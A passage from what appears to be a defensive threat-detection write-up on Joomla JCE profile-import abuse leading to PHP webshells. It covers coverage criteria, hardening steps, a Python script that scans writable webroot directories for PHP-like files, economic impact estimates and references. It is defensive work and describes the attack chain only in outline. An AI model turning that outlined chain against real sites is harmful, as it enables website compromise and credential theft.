Hosted-Content Tampering and Abuse Infrastructure
Covered where webroot file telemetry, CMS content review, WAF logs, hosting-control logs, FTP logs, DNS/proxy logs, abuse reports, and file integrity monitoring can be tied to the affected Joomla site.
Post-Patch Compromise Validation
Covered through hunting logic, file review, web-log review, rogue profile inspection, credential rotation guidance, backup comparison, malware scanning, and hosting-control review.
Evidence and Visibility Gaps
Covered by telemetry requirements, detection gaps, non-coverage conditions, cloud telemetry limitations, and local implementation guidance.
S29 Detection Coverage Summary
Coverage is strongest where web logs, WAF logs, reverse-proxy logs, CMS profile state, file telemetry, endpoint process telemetry, DNS/proxy logs, FTP logs, hosting-control logs, and asset inventory can be joined by Joomla site, virtual host, backend host, source, file path, process, destination, and time window.
Minimum viable coverage requires visibility into JCE profile-import requests and web access to PHP-like files in writable Joomla paths.
Stronger coverage requires file telemetry, endpoint telemetry, CMS profile review, and egress telemetry.
Highest confidence requires correlation across JCE profile-import request activity, rogue JCE profile state, unexpected PHP artifacts, HTTP access to those artifacts, web server process behavior, sensitive file access, rare egress, and hosted-content changes.
Cloud-native logs alone are insufficient unless combined with Joomla application-layer logs, host telemetry, workload identity mapping, and URI-preserving web telemetry.
Customer-specific telemetry validation is expected and does not reduce production-readiness when Required Telemetry, Engineering Implementation Instructions, Limitations, and Notes / Next Suggested Steps provide the engineer or administrator with a clear implementation path.
S33 Defensive Control & Hardening Improvements
Update JCE to 2.9.99.6 or later.
Apply vendor-provided stopgap patch only where upgrade is not immediately possible.
Preserve web server access logs before rotation.
Review JCE editor profiles for unfamiliar, auto-generated, recently created, or abnormal entries.
Remove rogue profiles and files uploaded through them.
Disable PHP execution in tmp, images, media, uploads, cache, and other writable directories.
Search for PHP-like files in directories that should not execute server-side code.
Review Joomla configuration.php, database credentials, FTP credentials, mail settings, API keys, backup archives, and environment files for exposure risk.
Rotate Joomla administrator, database, FTP, hosting-control, SSH, mail, and reused credentials after suspected compromise.
Run server-side malware scanning and compare webroot state against known-good backups.
Review hosted content for defacement, injected redirects, phishing pages, malware hosting, spam scripts, and unexpected templates or plugins.
Review FTP, hosting-control, file-manager, backup, and deployment logs.
Add WAF filtering for suspicious com_jce profile import requests.
Validate file-integrity monitoring for Joomla webroots and writable directories.
Maintain a current asset inventory of Joomla sites and installed JCE versions.
Preserve logs from web servers, WAF, reverse proxy, load balancer, endpoint, DNS, proxy, FTP, hosting-control, database, and backup sources during investigation.
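Two of the hardening steps above, disabling PHP execution in writable directories and searching those directories for PHP-like files, can be checked with one script. The following is an added example written for this section, not a CyberDax or Joomla tool: it walks the writable directories of a Joomla webroot, flags files whose name carries a PHP-type extension (including double extensions) or whose first bytes contain a PHP open tag, and reports writable directories that lack an Apache mod_php-style engine-off block in their .htaccess. The directory list, the directive patterns and the sample tree it builds under a temporary directory are assumptions; the .htaccess check only applies to Apache with mod_php, so nginx or PHP-FPM deployments need the equivalent location rules checked separately.

```python
import re
import tempfile
from pathlib import Path

# Joomla directories that must hold data but never execute server-side code (assumed list).
WRITABLE_DIRS = ("tmp", "images", "media", "uploads", "cache", "logs")
# Matches foo.php, foo.phtml, foo.php7 and double extensions such as foo.jpg.php or foo.php.txt.
PHP_EXT_RE = re.compile(r"\.(php\d?|phtml|phar|phps|pht)(\.|$)", re.IGNORECASE)
# PHP open tags, for payloads hiding behind a harmless-looking extension.
PHP_TAG_RE = re.compile(rb"<\?php|<\?=", re.IGNORECASE)
# Apache mod_php-style directives that stop PHP execution in a directory (heuristic).
ENGINE_OFF_RE = re.compile(r"php_(admin_)?flag\s+engine\s+off|RemoveHandler|SetHandler\s+none", re.IGNORECASE)

def php_like(path: Path) -> bool:
    """True if the file name or its first bytes look like PHP."""
    if PHP_EXT_RE.search(path.name):
        return True
    try:
        with path.open("rb") as fh:
            return bool(PHP_TAG_RE.search(fh.read(4096)))
    except OSError:
        return False

def audit_webroot(webroot):
    """Return PHP-like files under writable directories and directories lacking an engine-off block."""
    root = Path(webroot)
    findings = {"php_like_files": [], "dirs_without_engine_off": []}
    for name in WRITABLE_DIRS:
        base = root / name
        if not base.is_dir():
            continue
        htaccess = base / ".htaccess"
        if not (htaccess.is_file() and ENGINE_OFF_RE.search(htaccess.read_text(errors="ignore"))):
            findings["dirs_without_engine_off"].append(name)
        for p in base.rglob("*"):
            if p.is_file() and p.name != ".htaccess" and php_like(p):
                findings["php_like_files"].append(p.relative_to(root).as_posix())
    findings["php_like_files"].sort()
    return findings

def build_sample_webroot():
    """Constructed Joomla-like tree (not a real site) so the audit runs stand-alone."""
    root = Path(tempfile.mkdtemp(prefix="joomla-audit-"))
    for d in ("images/stories", "tmp", "cache"):
        (root / d).mkdir(parents=True)
    (root / "images" / ".htaccess").write_text("php_flag engine off\nRemoveHandler .php .phtml .php5\n")
    (root / "images" / "stories" / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n")
    (root / "images" / "stories" / "banner.jpg.php").write_bytes(b"\xff\xd8\xff")  # double extension
    (root / "tmp" / "cache_a1b2.txt").write_bytes(b"<?php echo 'x'; ?>")          # PHP tag behind .txt
    (root / "cache" / "page.html").write_text("<html></html>\n")
    return root

if __name__ == "__main__":
    print(audit_webroot(build_sample_webroot()))
```

On the sample tree the audit reports images/stories/banner.jpg.php (name rule) and tmp/cache_a1b2.txt (content rule), and lists tmp and cache as writable directories without an engine-off block; images passes because its .htaccess carries both php_flag engine off and a RemoveHandler line. Point audit_webroot() at a real Joomla root and feed the file list into the profile review and backup comparison steps above; a clean result from this script is evidence for the webroot only, not for the JCE profile table or the database.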
S39 Economic Impact & Organizational Exposure
Joomla JCE profile-import abuse creates organizational exposure by increasing uncertainty around website integrity, CMS profile trust, executable upload controls, server-side file integrity, credential confidentiality, hosted-content reliability, customer-facing communications, hosting-provider trust, and public brand reputation. Exposure rises when affected Joomla sites support customer portals, ecommerce, regulated content collection, authentication-adjacent workflows, public communications, customer documentation, marketing operations, or business-critical hosted applications.
Estimated Economic Exposure
Estimated exposure should be scenario-based and tied to whether activity remains limited to vulnerable exposure or suspicious profile-import attempts, becomes PHP webshell execution, or expands into credential access, database access, hosted-content tampering, phishing or malware hosting, abuse-report handling, legal review, customer communications, or multi-site compromise.
Low Impact Scenario
Estimated $15K - $75K.
This scenario applies when vulnerable-version exposure or suspicious JCE profile-import activity is identified quickly, exploit attempts are blocked or unsuccessful, and web-log review, profile inspection, file-system scanning, and update validation confirm no rogue profile, unexpected PHP artifact, webshell execution, credential access, content tampering, outbound callback, or customer impact.
Moderate Impact Scenario
Estimated $75K - $400K.
This scenario applies when a rogue JCE profile, suspicious PHP file, suspicious upload-policy change, suspicious PHP access, or incomplete telemetry prevents the organization from quickly ruling out webshell activity, credential exposure, hosted-content tampering, database access, or abuse infrastructure.
High Impact Scenario
Estimated $400K - $2.5M+.
This scenario applies when attackers executed PHP payloads, modified customer-facing content, accessed Joomla configuration files, accessed credentials, touched databases, hosted phishing or malware, created spam infrastructure, compromised multiple Joomla sites, triggered public abuse reports, affected ecommerce or customer portals, required legal review, or forced emergency rebuild and restoration of web trust.
Annualized Risk Exposure
Estimated $75K - $500K for organizations with several externally facing Joomla sites, incomplete JCE inventory, limited CMS logging, short web-log retention, weak file telemetry, missing endpoint visibility, or incomplete hosting-control records.
Exposure may exceed $500K - $2.5M+ where Joomla compromise results in credential theft, database access, hosted-content manipulation, phishing or malware hosting, ecommerce exposure, regulated content exposure, customer-facing service interruption, legal review, customer communications, or public restoration of trust.
Operational Dependency
Operational dependency is high where Joomla supports customer acquisition, customer service, ecommerce, documentation, partner communication, authentication-adjacent workflows, marketing operations, regulated content collection, or public trust.
Control Trust
Control trust is reduced when the organization cannot prove that JCE profiles, upload settings, webroot files, writable directories, Joomla administrators, credentials, database access, FTP activity, hosting-control activity, and hosted content remained legitimate during the exposure window.
Visibility Confidence
Visibility confidence is highest when web logs, WAF logs, reverse-proxy logs, CMS profile state, file telemetry, endpoint telemetry, DNS/proxy logs, FTP logs, hosting-control logs, database logs, backup records, approved inventories, and maintenance records can be joined reliably.
Change-Control Confidence
Change-control confidence is high when JCE updates, profile changes, CMS administration, plugin updates, template changes, file modifications, backup restores, credential rotations, WAF changes, and emergency remediation are documented and attributable.
Downstream Dependency
Downstream dependency is high when Joomla connects to databases, mail servers, payment pages, customer forms, file uploads, customer portals, marketing automation, analytics scripts, hosting-control systems, backup systems, FTP workflows, CDN services, or adjacent business applications.
Customer and Regulatory Exposure
Customer and regulatory exposure increases when suspicious Joomla activity may affect customer-facing content, regulated content, contact-form data, ecommerce records, uploaded documents, credentials, payment-page integrity, authentication-adjacent workflows, phishing or malware hosting, or public communications.
Residual Economic Risk
Residual economic risk remains if the organization cannot prove that vulnerable JCE versions were updated, rogue profiles were removed, unexpected PHP files were identified, webshell execution was ruled out, credentials were rotated where required, hosted content was reviewed, databases were checked where warranted, outbound behavior was scoped, and website integrity was restored.
Behavioral Coverage Assessment
This TTD covers Joomla JCE profile-import abuse aligned with unauthenticated CMS profile-state manipulation, executable upload enablement, PHP payload placement, web-accessible execution, webshell behavior, credential-file access, rare egress, hosted-content tampering, and post-patch compromise validation.
The TTD is not limited to one CVE string, exploit payload, request path, user agent, IP address, webshell name, WAF signature, scanner result, vendor advisory, or proof-of-concept implementation.
Detection Engineering Coverage Interpretation
The S25 detection content provides direct behavioral coverage where observable activity falls inside the TTD’s detection model: suspicious JCE profile import, rogue profile or upload-policy state, PHP-like file placement in writable paths, HTTP access to PHP-like files, web server service-context execution, sensitive Joomla file access, rare egress, FTP or hosting-control activity, and hosted-content changes.
The S25 detection content provides coverage with adaptation for related Joomla, CMS extension, PHP webshell, shared-hosting, webroot tampering, credential-file access, or hosted-content abuse activity where observable behavior aligns to CMS configuration abuse, executable upload enablement, webshell execution, credential exposure, file tampering, or abuse infrastructure.
Non-Coverage Conditions
Non-coverage applies where related activity does not produce observable JCE profile-import behavior, rogue CMS profile state, executable upload enablement, PHP-like file placement, web-accessible execution, web server service-context execution, sensitive file access, rare egress, FTP activity, hosting-control activity, hosted-content tampering, or website integrity impact.
Activity limited to unrelated Joomla vulnerabilities, unrelated CMS platforms, generic PHP webshell activity without JCE linkage, cloud-only anomalies, identity-only anomalies, network-only anomalies, isolated scanner findings, benign administrative maintenance, or unrelated hosting-control issues should not be represented as covered by this TTD unless behavior aligns to the detection model.
Coverage Qualification
This is a behavioral detection-readiness statement, not a universal Joomla, CMS, PHP, webshell, cloud-hosting, CVE, KEV, or proof-of-concept coverage ledger. A related issue should only be considered aligned when it shares enough observable behavior with the TTD’s detection model to support credible detection or detection-readiness coverage.
KEV status, vendor severity, exploit availability, or public proof-of-concept status should be treated as urgency and remediation-prioritization signals, not as the basis for coverage by themselves. Coverage remains based on observable Joomla/JCE-to-PHP-execution behavior aligned to the TTD’s S21 through S25 detection strategy.
Executive Exposure Statement
The organization’s economic exposure is highest when Joomla JCE compromise creates uncertainty around whether website content, CMS profile state, upload controls, webroot files, credentials, databases, hosting-control activity, outbound behavior, and customer-facing content remain trustworthy. The strategic risk is not one CVE or one request path; it is the possibility that attackers can convert a trusted CMS editor extension into PHP execution and leave backdoors or content changes behind after patching.
S40 References
Vendor / Platform Documentation
· JCE / Widget Factory - JCE Security Update and Free Patch for Older Sites - hxxps://www[.]joomlacontenteditor[.]net/news/jce-security-update-and-a-free-patch-for-older-sites
· Joomla Content Editor - hxxps://www[.]joomlacontenteditor[.]net/
· Joomla Documentation - Security Checklist - hxxps://docs[.]joomla[.]org/Security_Checklist
Vulnerability and Technical Analysis
· NVD - CVE-2026-48907 - hxxps://nvd[.]nist[.]gov/vuln/detail/CVE-2026-48907
· YesWeHack - RCE in Joomla Content Editor Extension - hxxps://www[.]yeswehack[.]com/news/rce-joomla-content-editor-extension
Threat Technique Framework
· MITRE ATT&CK Enterprise Matrix / Techniques Catalog - hxxps://attack[.]mitre[.]org/
Detection Platform Documentation
· SentinelOne Documentation - hxxps://docs[.]sentinelone[.]com/
· Splunk Search Reference - hxxps://docs[.]splunk[.]com/Documentation/Splunk/latest/SearchReference/WhatsInThisManual
· Elastic Security Detection Rules Documentation - hxxps://www[.]elastic[.]co/guide/en/security/current/rules-ui-management.html
· IBM QRadar Documentation - hxxps://www[.]ibm[.]com/docs/en/qradar-common
· Sigma Rule Specification - hxxps://sigmahq[.]io/docs/basics/rules.html
· YARA Documentation - hxxps://yara[.]readthedocs[.]io/
· AWS WAF Documentation - hxxps://docs[.]aws[.]amazon[.]com/waf/
· Azure Monitor Logs Documentation - hxxps://learn[.]microsoft[.]com/azure/azure-monitor/logs/
· Google Cloud Logging Documentation - hxxps://cloud[.]google[.]com/logging/docs